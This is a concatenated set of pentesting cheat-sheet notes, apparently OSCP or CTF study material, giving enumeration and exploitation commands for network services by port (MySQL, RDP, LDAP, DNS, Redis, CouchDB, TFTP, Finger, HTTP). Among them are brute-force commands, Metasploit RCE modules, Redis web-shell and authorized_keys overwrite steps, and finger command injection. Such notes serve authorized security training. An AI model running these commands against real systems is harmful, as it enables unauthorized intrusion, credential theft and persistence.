mysql -u root # Connect to root without password 19 | mysql -u root -p # A password will be asked (check someone) 20 | ``` 21 | 22 | #### Remote 23 | 24 | ```bash 25 | mysql --host= -u root -p 26 | mysql -h -u root 27 | mysql -h -u root@localhost 28 | ``` 29 | 30 | ### nmap 31 | 32 | ```bash 33 | kali@kali:~/oscp/labs/10.11.1.8$ nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 34 | nmap -sV -Pn --script=mysql-audit.nse,mysql-brute.nse,mysql-databases.nse,mysql-dump-hashes.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-query.nse,mysql-users.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse -p 3306 -o 3306_nmap_mysql 35 | nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 36 | ``` 37 | 38 | ### Metasploit 39 | 40 | ```bash 41 | msf> use auxiliary/scanner/mysql/mysql_version 42 | msf> use uxiliary/scanner/mysql/mysql_authbypass_hashdump 43 | msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds 44 | msf> use auxiliary/admin/mysql/mysql_enum #Creds 45 | msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds 46 | msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds 47 | ``` 48 | 49 | ### Extract Credentials 50 | 51 | ```bash 52 | cat /etc/mysql/debian.cnf 53 | grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password" 54 | ``` 55 | 56 | ## Brute Force 57 | 58 | ### Hydra 59 | 60 | ```bash 61 | hydra -L -P mysql -vV -I -u 62 | ``` 63 | -------------------------------------------------------------------------------- /pentesting-network/3389-rdp.md: -------------------------------------------------------------------------------- 1 | # 3389 (RDP) 2 | 3 | ## Enumeration 4 | 5 | ### Checks 6 | 7 | * [ ] Check if you can login with default guest account and blank password 8 | * [ ] Check if you can brute force users 9 | * [ ] Check for BlueKeep 10 | 11 | ### nmap 12 | 13 | ```bash 14 | nmap -p 3389 --script=rdp-enum-encryption,rdp-vuln-ms12-020 -o 3389_nmap_rdp 15 | nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 16 | ``` 17 | 18 | ### Check known credentials 19 | 20 | ```bash 21 | rdp_check /:@ # rdp_check.py from impacket 22 | ``` 23 | 24 | ### Manual Login 25 | 26 | #### rdesktop 27 | 28 | ```bash 29 | rdesktop 30 | # Try default guest account "guest":"" 31 | rdesktop -u guest -g 94% 32 | rdesktop -u guest -p guest -g 94% 33 | # Use known credentials 34 | rdesktop -u 35 | rdesktop -d -u -p 36 | ``` 37 | 38 | #### xfreerdp 39 | 40 | ```bash 41 | xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:[IP] /u:bitbucket /p:[PW] 42 | 43 | xfreerdp /u:username /p:password /cert:ignore /v:MACHINE_IP 44 | xfreerdp /u:[DOMAIN\] /p: /v: 45 | 46 | xfreerdp /u:[DOMAIN\] /pth: /v: 47 | 48 | xfreerdp /u:[domain\] /p: /v: 49 | xfreerdp /u:[domain\] /pth: /v: 50 | ``` 51 | 52 | ## Brute Force 53 | 54 | #### ncrack 55 | 56 | ```bash 57 | ncrack -vv --user Administrator -P /usr/share/wordlists/rockyou.txt rdp:// 58 | ncrack -vv --user Administrator -P /usr/share/seclists/Passwords/darkweb2017-top100.txt rdp:// 59 | 60 | ``` 61 | 62 | #### Hydra 63 | 64 | ```bash 65 | hydra -l username -P /usr/share/wordlists/rockyou.txt -t 5 -V ip_address rdp 66 | hydra -f -L -P rdp:// -u -vV 67 | ``` 68 | 69 | #### crowbar 70 | 71 | ```bash 72 | crowbar -b rdp -s /CIDR -u -C 73 | crowbar -b rdp -s /CIDR -U -C 74 | ``` 75 | -------------------------------------------------------------------------------- /pentesting-network/3632-distcc.md: -------------------------------------------------------------------------------- 1 | # 3632 (distcc) 2 | 3 | ## Searchsploit 4 | 5 | ```bash 6 | searchsploit # Use searchsploit on nmap Service output details 7 | ``` 8 | 9 | ## Exploitation Checks 10 | 11 | Check if it's vulnerable to **CVE-2004-2687** to execute arbitrary code: 12 | 13 | ```bash 14 | msf5 > use exploit/unix/misc/distcc_exec 15 | nmap -p 3632 --script distcc-exec --script-args="distcc-exec.cmd='id'" 16 | ``` 17 | -------------------------------------------------------------------------------- /pentesting-network/389-ldap.md: -------------------------------------------------------------------------------- 1 | # 389 (LDAP) 2 | 3 | ## Enumeration 4 | 5 | ### Anonymous 6 | 7 | #### ldapsearch 8 | 9 | New Syntax 10 | 11 | ```bash 12 | ldapsearch -H ldap:// -x -b "DC=hutch,DC=offsec" 13 | ldapsearch -H ldap://192.168.71.122 -x -b "CN=Users,DC=hutch,DC=offsec" # Get User info 14 | # Look for any plaintext passwords in the description field 15 | ldapsearch -H "ldap://" -v -x -b "DC=hutch,DC=offsec" "(objectclass=*)" 16 | 17 | # If LAPS is found on the server, can look for admin password 18 | ldapsearch -H ldap:// -v -x -D @HUTCH.OFFSEC -w -b "DC=hutch,DC=offsec" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd 19 | ``` 20 | 21 | Old Syntax 22 | 23 | ```bash 24 | ldapsearch -h -x -s base namingcontexts # Look for the dn: i.e. DC=htb,DC=local 25 | ldapsearch -h -x -b "DC=htb,DC=local" > ldap-anonymmous.out # All ldap info we can query as anonymous 26 | ldapsearch -h -x -s sub -b "DC=htb,DC=local" 27 | ldapsearch -h -x -b "DC=htb,DC=local" '(objectClass=Person)' # Look at user info 28 | ldapsearch -h -x -b "DC=htb,DC=local" '(objectClass=Person)' sAMAccountName 29 | # Grab just the usernames to try and brute force/password spray 30 | ldapsearch -h -x -b "DC=htb,DC=local" '(objectClass=Person)' sAMAccountName | grep sAMAccountName | awk '{print $2}' > userlist.ldap # Make it easier to do a password spray 31 | # Can try to check password policy with crackmapexec 32 | crackmapexec smb --pass-pol -u '' -p '' # Using null user & passowrd 33 | # Look for 'Account lockout threshold: 0' # Ideal for brute force 34 | # Brute Force 35 | crackmapexec smb -u userlist.txt -p pwlist.txt 36 | ``` 37 | 38 | #### nmap 39 | 40 | ```bash 41 | nmap -n -sV --script "ldap* and not brute" # Using anonymous credentials 42 | ``` 43 | 44 | ### Authenticated 45 | 46 | #### ldapdomaindump 47 | 48 | ```bash 49 | kali@kali:~/ctf/tryhackme/enterprise$ ldapdomaindump 10.10.55.72 -u 'LAB-ENTERPRISE\nik' -p ToastyBoi! -o ldapdomaindumpdir 50 | ``` 51 | -------------------------------------------------------------------------------- /pentesting-network/464-kpasswd.md: -------------------------------------------------------------------------------- 1 | # 464 (kpasswd) 2 | 3 | ## nmap output 4 | 5 | ```bash 6 | 464/tcp open kpasswd5? 7 | ``` 8 | 9 | > The fact you're seeing this service and port suggests you may be scanning a Domain Controller, for which both UDP & TCP ports 464 are used by the Kerberos Password Change. This port in particular is used for changing/setting passwords against Active Directory. 10 | > 11 | > [https://security.stackexchange.com/questions/205492/what-is-this-service](https://security.stackexchange.com/questions/205492/what-is-this-service) 12 | -------------------------------------------------------------------------------- /pentesting-network/53-dns.md: -------------------------------------------------------------------------------- 1 | # 53 (DNS) 2 | 3 | ## Enumeration 4 | 5 | When seeing port 53 show up, you can add the IP of the host to the resolv.conf file 6 | 7 | `nameserver ` 8 | 9 | ### Hostname Leak 10 | 11 | #### nslookup 12 | 13 | ```bash 14 | nslookup 15 | > server 16 | >127.0.0.1 17 | >127.0.0.2 18 | > 19 | ``` 20 | 21 | ### Banner Grabbing 22 | 23 | ```bash 24 | dig version.bind CHAOS TXT @DNS 25 | ``` 26 | 27 | ### More Info 28 | 29 | #### nslookup 30 | 31 | ```bash 32 | root@INE:~# nslookup 33 | > server 192.212.168.3 34 | > set q=NS # Can also change per record i.e. A, MX, etc. 35 | > witrap.com # Chage the hostname as needed 36 | # Should return additional domains 37 | ``` 38 | 39 | #### dnsenum 40 | 41 | ```bash 42 | dnsenum target # Zone transfer 43 | ``` 44 | 45 | #### nmap 46 | 47 | ```bash 48 | nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" 49 | nmap --script dns-nsid 50 | ``` 51 | 52 | #### gobuster 53 | 54 | ```bash 55 | gobuster dns -d cronos.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt 56 | ``` 57 | 58 | #### Metasploit 59 | 60 | ```bash 61 | auxiliary/gather/enum_dns # Perform enumeration actions 62 | ``` 63 | 64 | ### Zone Transfers 65 | 66 | #### dig / fierce 67 | 68 | ```bash 69 | dig axfr @ns1.test.com 70 | dig axfr @ # Try zone transfer without domain 71 | dig axfr @ # Try zone transfer guessing the domain 72 | fierce --domain --dns-servers # Will try to perform a zone transfer against every authoritative name server and if this doesn'twork, will launch a dictionary attack 73 | dig @192.212.168.3 witrap.com -t AXFR +nocookie 74 | ``` 75 | 76 | #### Host 77 | 78 | ```bash 79 | # Zone transfer 80 | sudo vim /etc/hosts 81 | 10.10.10.123 friendzone.red 82 | host -l 10.10.10.123 friendzone.red # Zone Transfer 83 | host -t axfr witrap.com 192.212.168.3 84 | ``` 85 | 86 | #### dnsrecon 87 | 88 | ```bash 89 | dnsrecon -d target.com -t axfr # Zone Transfer 90 | dnsrecon -d target.com -D words.txt -t brt # Brute force domain 91 | dnsrecon -d -a 92 | ``` 93 | 94 | ## Brute Force 95 | 96 | ### Reverse 97 | 98 | #### dnsrecon 99 | 100 | ```bash 101 | dnsrecon -d 102 | dnsrecon -d active.htb -a -n # Zone transfer 103 | dnsrecon -r 127.0.0.0/24 -n -d # DNS reverse of all of the addresses 104 | dnsrecon -r 127.0.0.1/24 -n -d # DNS reverse of all of the addresses 105 | dnsrecon -r /24 -n # DNS reverse of all of the addresses 106 | dnsrecon -d -r 10.0.0.0/8 107 | ``` 108 | 109 | ### Subdomain 110 | 111 | #### dnsrecon / dnscan 112 | 113 | ```bash 114 | dnsrecon -D subdomains-1000.txt -d -n 115 | dnscan -d -r -w subdomains-1000.txt # Bruteforce subdomains in recursive way, https://github.com/rbsec/dnscan 116 | ``` 117 | 118 | #### Other 119 | 120 | ``` 121 | https://github.com/blark/aiodnsbrute 122 | ``` 123 | -------------------------------------------------------------------------------- /pentesting-network/5432-postgresql.md: -------------------------------------------------------------------------------- 1 | # 5432 (postgresql) 2 | 3 | ## Enumeration 4 | 5 | ### Connection 6 | 7 | #### Default Credentials 8 | 9 | `postgres:postgres` 10 | 11 | ```bash 12 | psql -U # Open psql console with user 13 | psql -h -U -d # Remote connection 14 | psql -h -p -U -W # Remote connection 15 | ``` 16 | 17 | ### Commands 18 | 19 | ```sql 20 | psql -h localhost -d -U # Password will be prompted 21 | \list # List databases 22 | \c # use the database 23 | \d # List tables 24 | \du+ # Get users roles 25 | ``` 26 | 27 | ## Exploitation 28 | 29 | ### RCE - Authenticated 30 | 31 | #### searchsploit 32 | 33 | ```bash 34 | kali@kali:~/Documents/offsec/oscp/proving_grounds/Nibbles$ searchsploit postgresql 35 | --------------------------------------------------------------------------------- --------------------------------- 36 | Exploit Title | Path 37 | --------------------------------------------------------------------------------- --------------------------------- 38 | PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated) | multiple/remote/50847.py 39 | --------------------------------------------------------------------------------- --------------------------------- 40 | ``` 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /pentesting-network/5900-vnc.md: -------------------------------------------------------------------------------- 1 | # 5900 (VNC) 2 | 3 | ## Checks 4 | 5 | * [ ] Check for easy VNC passwords 6 | * [ ] Check for exploits for VNC version 7 | * [ ] Brute force VNC password 8 | 9 | ## Enumeration 10 | 11 | ### nmap 12 | 13 | ```bash 14 | nmap -sV -Pn -p 5900 --script=vnc-info,vnc-title,realvnc-auth-bypass -oA 5900_nmap_VNC 15 | nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 5900,5800 16 | nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -v -p 17 | nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 18 | ``` 19 | 20 | ### Metasploit 21 | 22 | #### Login Scan 23 | 24 | ```bash 25 | use auxiliary/scanner/vnc/vnc_login 26 | set rhosts 27 | run 28 | ``` 29 | 30 | #### No-auth Scan 31 | 32 | ```bash 33 | use auxiliary/scanner/vnc/vnc_none_auth 34 | set rhosts 35 | run 36 | ``` 37 | 38 | #### Post exploit module 39 | 40 | ```bash 41 | background 42 | use post/windows/gather/credentials/vnc 43 | set session X 44 | exploit 45 | 46 | vncviewer 192.168.1.109 47 | ``` 48 | 49 | ## Connection 50 | 51 | ```bash 52 | vncviewer [-passwd passwd.txt] ::5901 53 | vncviewer : 54 | ``` 55 | 56 | ## Brute Force 57 | 58 | ```bash 59 | hydra -s 5900 -P /usr/share/seclists/Passwords/darkweb2017-top10.txt -t 30 vnc 60 | hydra -L –P -s vnc -u -vV 61 | ``` 62 | -------------------------------------------------------------------------------- /pentesting-network/5984-6984-couchdb.md: -------------------------------------------------------------------------------- 1 | # 5984, 6984 (CouchDB) 2 | 3 | ## Enumeration 4 | 5 | ### Automatic 6 | 7 | ```bash 8 | nmap -sV --script couchdb-databases,couchdb-stats -p 9 | msf> use auxiliary/scanner/couchdb/couchdb_enum 10 | ``` 11 | 12 | ### Manual 13 | 14 | ```bash 15 | curl http://:5984 16 | # Banner grab (Can also open in a browser) 17 | curl http://:5984/_all_dbs 18 | # List of all the databases 19 | curl http://user:password@:5984/_all_dbs 20 | # List of all the databases with authentication 21 | curl http://:5984/ 22 | # List database information 23 | curl http://:5984//_all_docs 24 | # List each entry inside of a database 25 | curl http://:5984// 26 | # Read content of a document in a database 27 | curl http://10.10.202.192:5984/_utils/ 28 | # Path for the web administration tool 29 | ``` 30 | 31 | ## Exploitation 32 | 33 | ### Unprotected 34 | 35 | #### CVE-2017-12636 36 | 37 | Since we should have administrative access here we should be able to find an exploit to execute. 38 | 39 | * Found: [https://github.com/moayadalmalat/CVE-2017-12636](https://github.com/moayadalmalat/CVE-2017-12636) 40 | * Download code and update the **target** and **command** variables in the script 41 | * Start a netcat listener: `nc -lvnp 4444` 42 | * Run the exploit: `python3 exploit.py` 43 | 44 | ### Protected 45 | 46 | Since we do NOT have access we will need to get access. 47 | 48 | #### Brute Force 49 | 50 | Hydra 51 | 52 | ```bash 53 | hydra -l admin -P /opt/100-common-passwords.txt -s 5984 -f http-get /_utils 54 | # And we get the password 55 | ``` 56 | 57 | Metasploit 58 | 59 | ```bash 60 | use auxiliary/scanner/couchdb/couchdb_login 61 | set RHOSTS demo2.ine.local 62 | set USERNAME admin 63 | set PASS_FILE /root/Desktop/wordlists/100-common-passwords.txt 64 | set STOP_ON_SUCCESS True 65 | set VERBOSE true 66 | exploit 67 | ``` 68 | 69 | #### RCE 70 | 71 | Metasploit 72 | 73 | ```bash 74 | search couchdb 75 | use exploit/linux/http/apache_couchdb_cmd_exec 76 | set PAYLOAD linux/x64/meterpreter/bind_tcp 77 | set RHOSTS 78 | set LHOST 79 | set httpusername admin 80 | set httppassword madalina 81 | exploit 82 | ``` 83 | -------------------------------------------------------------------------------- /pentesting-network/5985-winrm.md: -------------------------------------------------------------------------------- 1 | # 5985 (WinRM) 2 | 3 | ## Enumeration 4 | 5 | ## Connection 6 | 7 | #### crackmapexec 8 | 9 | ```bash 10 | crackmapexec winrm -u -p 11 | crackmapexec winrm -u -p -X "whoami" # Run a command 12 | ``` 13 | 14 | #### evil-winrm 15 | 16 | PowerShell Remoting 17 | 18 | ```bash 19 | # Attempt to log into the machine 20 | evil-winrm -i -u -p 21 | evil-winrm -i -u -H 22 | # Specify a local directory to execute scripts from 23 | evil-winrm -i -u -p -s . 24 | ``` 25 | 26 | Upload File to Target 27 | 28 | ```bash 29 | # From compromised target 30 | Evil-WinRM PS C:\Users\FSmith\Documents> upload winPEAS.exe 31 | Evil-WinRM PS C:\Users\FSmith\Documents> .\winPEAS.exe 32 | ``` 33 | 34 | Download From from Target 35 | 36 | ```bash 37 | # From compromised target 38 | Evil-WinRM PS C:\Users\FSmith\Documents> download 123_BloodHound.zip 39 | ``` 40 | -------------------------------------------------------------------------------- /pentesting-network/6379-redis.md: -------------------------------------------------------------------------------- 1 | # 6379 (Redis) 2 | 3 | ## Enumeration 4 | 5 | ### Automatic 6 | 7 | #### nmap 8 | 9 | ```bash 10 | nmap --script redis-info -sV -p 6379 11 | ``` 12 | 13 | #### Metasploit 14 | 15 | ```bash 16 | msf> use auxiliary/scanner/redis/redis_server 17 | ``` 18 | 19 | ### Manual 20 | 21 | #### Telnet, Netcat, Redis-cli 22 | 23 | ```bash 24 | telnet 6379 25 | nc -vn 6379 26 | redis-cli -h 27 | ``` 28 | 29 | Commands: 30 | 31 | ```bash 32 | # Check version info etc. as well as the ability to run commands without auth 33 | INFO 34 | # List all the stored keys. 35 | KEYS * 36 | # Get the value of a stored key 37 | GET 38 | # Other 39 | config get * 40 | config get dir 41 | ``` 42 | 43 | #### Curl Gopher 44 | 45 | ``` 46 | curl gopher://demo1.ine.local:6379/_GET%20flag --max-time 1 47 | ``` 48 | 49 | #### LFI 50 | 51 | If LFI is found, you can enumerate the local file system for interesting files 52 | 53 | ```bash 54 | # Look at the redis configuration file (check for passwords) 55 | /etc/redis/redis.conf 56 | # Look for the web DocumentRoot in the conf file 57 | /etc/apache2/sites-enabled/000-default.conf # Ex: apache2 58 | # Look at the redis service file (check for ReadWriteDirectories) 59 | /etc/systemd/system/redis.service 60 | ``` 61 | 62 | Attempt to write a file to a directory that is found in the web root or is listed as ReadWriteDirectories 63 | 64 | ## Exploitation 65 | 66 | ### PHP Web Shell 67 | 68 | ```bash 69 | redis-cli -h -a 70 | 192.168.97.166:6379> config set dir /opt/redis-files 71 | OK 72 | 192.168.97.166:6379> config set dbfilename rce.php 73 | OK 74 | 192.168.97.166:6379> set test "" # or 75 | 192.168.97.166:6379> set test "" # or 76 | 192.168.97.166:6379> set test "" 77 | OK 78 | 192.168.97.166:6379> save 79 | OK 80 | ``` 81 | 82 | ### Rogue Server 83 | 84 | [https://github.com/n0b0dyCN/redis-rogue-server](https://github.com/n0b0dyCN/redis-rogue-server) 85 | 86 | ```bash 87 | git clone https://github.com/n0b0dyCN/redis-rogue-server 88 | cd redis-rogue-server/ 89 | ./redis-rogue-server.py --rhost 192.168.76.69 --lhost 127.0.0.1 90 | # or 91 | python3 redis-rogue-server.py --rhost 192.168.76.69 --rport 6379 --lhost 192.168.49.76 --lport 6379 92 | 93 | ``` 94 | 95 | ### Load Redis Module 96 | 97 | > Need a way to place files (modules) onto the machine i.e. FTP 98 | 99 | [https://github.com/n0b0dyCN/RedisModules-ExecuteCommand](https://github.com/n0b0dyCN/RedisModules-ExecuteCommand) 100 | 101 | ```bash 102 | git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand 103 | cd RedisModules-ExecuteCommand 104 | make # Creates the module.so file 105 | ftp 106 | put module.so # Place the module in a writable directory 107 | # Identify ftp directory location e.g. vsFTPd = /var/ftp/ 108 | redis-cli -h 109 | 127.0.0.1:6379> MODULE LOAD /var/ftp/pub/module.so 110 | 127.0.0.1:6379> system.exec "id" 111 | ``` 112 | 113 | ### Unauthenticated Redis Server 114 | 115 | #### Metasploit 116 | 117 | ```bash 118 | msfconsole 119 | search redis 120 | use exploit/linux/redis/redis_replication_cmd_exec 121 | set RHOSTS 122 | set LHOST 123 | set SRVHOST 124 | exploit 125 | ``` 126 | 127 | ### Overwriting Arbitrary Files 128 | 129 | #### Redis-cli 130 | 131 | ```bash 132 | # Generate Key Pair 133 | ssh-keygen 134 | ssh-key 135 | 136 | 137 | # Copy key file and place onto Redis server naming it test 138 | # Ex: 1 139 | (echo -e "\n\n"; cat /root/ssh-key.pub; echo -e "\n\n") > key 140 | cat key | redis-cli -h demo2.ine.local -x set test 141 | # Ex: 2 142 | (echo -e "\n\n"; cat ./id_rsa.pub; echo -e "\n\n") > spaced_key.txt 143 | cat spaced_key.txt | redis-cli -h -x set ssh_key 144 | cat spaced_key.txt | redis-cli -h 192.168.97.166 -a -x set ssh_key 145 | # Dump the key to the target machine /root/.ssh/ directory using redis-cli 146 | redis-cli -h demo2.ine.local 147 | config set dir /root/.ssh/ 148 | config get dir 149 | config set dbfilename "authorized_keys" 150 | save 151 | # We have successfully uploaded the public key as authorized_keys. 152 | # Access the target machine 153 | ssh -i ssh-key root@demo2.ine.local 154 | ``` 155 | 156 | #### Metasploit 157 | 158 | ```bash 159 | use auxiliary/scanner/redis/file_upload 160 | set RHOSTS demo2.ine.local 161 | set LocalFile /root/key 162 | set RemoteFile /root/.ssh/authorized_keys 163 | exploit 164 | ``` 165 | 166 | ### Attacking Protected Redis 167 | 168 | #### Metasploit 169 | 170 | ```bash 171 | use auxiliary/scanner/redis/redis_login 172 | set RHOSTS demo3.ine.local 173 | exploit 174 | # We found a credential 175 | redis-cli -h demo3.ine.local 176 | AUTH daniel 177 | KEYS * 178 | GET 179 | ``` 180 | 181 | ### Eval Abuse 182 | 183 | > CTF Ex: Doing some research it is found that abuse of the eval and dotfile can be used 184 | 185 | ```bash 186 | # Get the contents of the user.txt file 187 | redis-cli -h -p 6379 eval "dofile('C:\\\Users\\\enterprise-security\\\Desktop\\\user.txt')" 0 188 | 189 | ``` 190 | 191 | ## Brute Force 192 | 193 | ```bash 194 | msf> use auxiliary/scanner/redis/redis_login 195 | nmap --script redis-brute -p 6379 196 | hydra –P /path/pass.txt redis://: # 6379 is the default 197 | ``` 198 | 199 | -------------------------------------------------------------------------------- /pentesting-network/6667-irc.md: -------------------------------------------------------------------------------- 1 | # 6667 (IRC) 2 | 3 | ## Enumeration 4 | 5 | ### nmap 6 | 7 | ```bash 8 | nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 irked.htb 9 | ``` 10 | 11 | ## Brute Force 12 | 13 | ### nmap 14 | 15 | ```bash 16 | nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p 17 | ``` 18 | -------------------------------------------------------------------------------- /pentesting-network/69-tftp.md: -------------------------------------------------------------------------------- 1 | # 69 (TFTP) 2 | 3 | ## Enumeration 4 | 5 | ### Checks 6 | 7 | * [ ] Search for files to find sensitive info like passwords 8 | * [ ] Uploads shells to trigger them in a webapp 9 | 10 | ### nmap 11 | 12 | ```bash 13 | nmap -sU -p 69 --script tftp-enum.nse 14 | nmap -n -Pn -sU -p69 -sV --script tftp-enum 15 | nmap -sU -p 69 --script tftp-enum.nse 16 | ``` 17 | 18 | ### Connection 19 | 20 | ```bash 21 | #setup the connection 22 | tftp 172.16.200.100 23 | #get a file 24 | tftp> get /etc/passwd 25 | #upload reverse shell 26 | tftp> put shell.php 27 | 28 | # Need unauthenticate access 29 | tftp 30 | tftp> ls 31 | ?Invalid command 32 | tftp> verbose 33 | Verbose mode on. 34 | tftp> put shell.php 35 | Sent 3605 bytes in 0.0 seconds [inf bits/sec] 36 | ``` 37 | 38 | ### Metasploit 39 | 40 | ```bash 41 | msfconsole 42 | use tftpbrute 43 | set dictionary /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt 44 | 45 | msf5> auxiliary/admin/tftp/tftp_transfer_util 46 | ``` 47 | -------------------------------------------------------------------------------- /pentesting-network/79-finger.md: -------------------------------------------------------------------------------- 1 | # 79 (Finger) 2 | 3 | ## Enumeration 4 | 5 | ### Banner Grabbing 6 | 7 | ```bash 8 | nc -vn 79 9 | echo "root" | nc -vn 79 10 | ``` 11 | 12 | ### nmap 13 | 14 | ```bash 15 | nmap -vvv -Pn -sC -sV -p79 16 | ``` 17 | 18 | ### finger 19 | 20 | ```bash 21 | finger @ 22 | finger @ 23 | finger @ #List users 24 | finger admin@ #Get info of user 25 | finger user@ #Get info of user 26 | ``` 27 | 28 | ### finger-user-enum 29 | 30 | ```bash 31 | finger-user-enum.pl -U users.txt -t 10.0.0.1 32 | finger-user-enum.pl -u root -t 10.0.0.1 33 | finger-user-enum.pl -U users.txt -T ips.txt 34 | ``` 35 | 36 | ### Metasploit 37 | 38 | ```bash 39 | use auxiliary/scanner/finger/finger_users 40 | ``` 41 | 42 | ## Command Execution 43 | 44 | ```bash 45 | finger "|/bin/id@" 46 | finger "|/bin/ls -a /" 47 | 48 | finger "|/bin/id@example.com" 49 | finger "|/bin/ls -a /@example.com" 50 | ``` 51 | -------------------------------------------------------------------------------- /pentesting-network/80-443-http-s/README.md: -------------------------------------------------------------------------------- 1 | # 80,443 (HTTP/S) 2 | 3 | ## Enumeration 4 | 5 | ### Initial Checks 6 | 7 | * [ ] Check for any CMS or vendor details by opening page in a browser 8 | * [ ] Burp (Add to scope) 9 | * [ ] Enumerate links 10 | * [ ] Enumerate input boxes (SQLi , XSS, Command Injection) 11 | * [ ] Directory busting (ffuf, gobuster, dirb, wfuzz) 12 | * [ ] Vulnerability Scanning (nikto, CMS scanner) 13 | * [ ] DNS, Virtual hosts, etc. (dig) 14 | * [ ] Subdomain busting (ffuf, gobuster, wfuzz, Assetfinder, Amass) 15 | * [ ] Parameter busting (ffuf, gobuster, wfuzz) 16 | * [ ] Brute force any login forms 17 | * [ ] Potential usernames found i.e. about\_us.html 18 | * [ ] Copy names to file; script to permutate found names into potential usernames 19 | * [ ] Ex: Fergus Smith, Fergus.Smith, FSmith, F.Smith 20 | * [ ] CeWL - create wordlist based off of words found online 21 | * [ ] `cewl -d 7 -m 8 --with-numbers -w cewl.out ` 22 | * [ ] Check SSL/TLS certificates for information and vulnerabilities 23 | * [ ] Subject Alt Names, Heartbleed, etc. 24 | * [ ] `sslscan ` 25 | 26 | ### Manual 27 | 28 | #### Initial Pages 29 | 30 | * /robots.txt 31 | * /sitemap.xml 32 | * /crossdomain.xml 33 | * /clientaccesspolicy.xml 34 | * /.well-known/ 35 | * Check also comments in the main and secondary pages. 36 | 37 | #### DevTools 38 | 39 | * View page source 40 | * View Network tab 41 | * View Cookies 42 | 43 | #### cURL 44 | 45 | ```bash 46 | # Check Headers 47 | curl -I https://academy.hackthebox.eu 48 | # Check Source Code 49 | curl https://academy.hackthebox.eu 50 | ``` 51 | 52 | ### Automatic 53 | 54 | #### nmap 55 | 56 | ```bash 57 | nmap -sV --script http-* 58 | nmap -sV --script http-vuln* 59 | nmap -sV --script http--* 60 | ``` 61 | 62 | #### whatweb 63 | 64 | ```bash 65 | whatweb # Basic 66 | whatweb -v # Verbose 67 | whatweb -a 1 # Stealthy 68 | whatweb -a 3 # Aggresive 69 | ``` 70 | 71 | #### nikto 72 | 73 | Basic 74 | 75 | ```bash 76 | nikto -h -o nikto.txt # Output to file. Also: csv, html, and xml available 77 | nikto -h | tee nikto.log # Alternate option for file output 78 | nikto -h -ssl | tee nikto.log # For SSL enabled sites 79 | # Multiple hosts 80 | nikto -h -p # Multiple Ports 81 | ``` 82 | 83 | Plugins 84 | 85 | 
nikto --list-plugins
 86 | nikto -h <IP> -Plugin apacheuser
 87 | nikto -h <IP> -Plugin cgi
 88 | nikto -h <IP> -Plugin robots
 89 | nikto -h <IP> -Plugin dir_traversal
 90 |
91 | 92 | Vulnerability Tuning 93 | 94 | ```bash 95 | nikto -h -Tuning 0 # File Upload 96 | nikto -h -Tuning 2 # Misconfigurations / Default Files 97 | nikto -h -Tuning 3 # Information Disclosure 98 | nikto -h -Tuning 4 # Injection 99 | nikto -h -Tuning 8 # Command Execution 100 | nikto -h -Tuning 9 # SQL Injection 101 | ``` 102 | 103 | ### CMS Scanners 104 | 105 | #### cmseek 106 | 107 | ```bash 108 | cmseek -u http:// -v 109 | ``` 110 | 111 | #### cmsmap 112 | 113 | ```bash 114 | cmsmap.py http:// 115 | ``` 116 | 117 | LIST OF CMS TYPES LINKING TO THEIR PAGE... 118 | 119 | ## Directory Busting 120 | 121 | ### dir 122 | 123 | Common extensions: php,txt,js,xml,html,pdf,old,bak,xxx,tar,zip,asp,aspx 124 | 125 | #### gobuster 126 | 127 | * /usr/share/seclists/Discovery/Web-Content/big.txt 128 | * /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 129 | * /usr/share/seclists/Discovery/Web-Content/common\* 130 | * /usr/share/seclists/Discovery/Web-Content/directory-list-\* 131 | * /usr/share/seclists/Discovery/Web-Content/raft-\* 132 | 133 | ```bash 134 | gobuster dir -u -w -x -o 135 | gobuster dir -u http://www.holo.live/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php -o gobuster_dir_80 136 | ``` 137 | 138 | ### vhost 139 | 140 | #### gobuster 141 | 142 | * /usr/share/seclists/Discovery/DNS/subdomains-top1million-\* 143 | 144 | ```bash 145 | gobuster vhost -u -w 146 | gobuster vhost -u holo.live -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt 147 | gobuster vhost -u http://www.holo.live/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt 148 | ``` 149 | 150 | ### fuzz 151 | 152 | #### gobuster 153 | 154 | ```bash 155 | gobuster fuzz -u ?= -w --exclude-length 156 | gobuster fuzz -u http://admin.holo.live/dashboard.php?FUZZ=ls+-la -w /usr/share/seclists/Discovery/Web-Content/big.txt --exclude-length 0 157 | gobuster fuzz -u http://192.168.212.212/secret/evil.php?FUZZ=/etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --exclude-length 0 158 | 159 | ``` 160 | 161 | #### ffuf 162 | 163 | ```bash 164 | ffuf -u 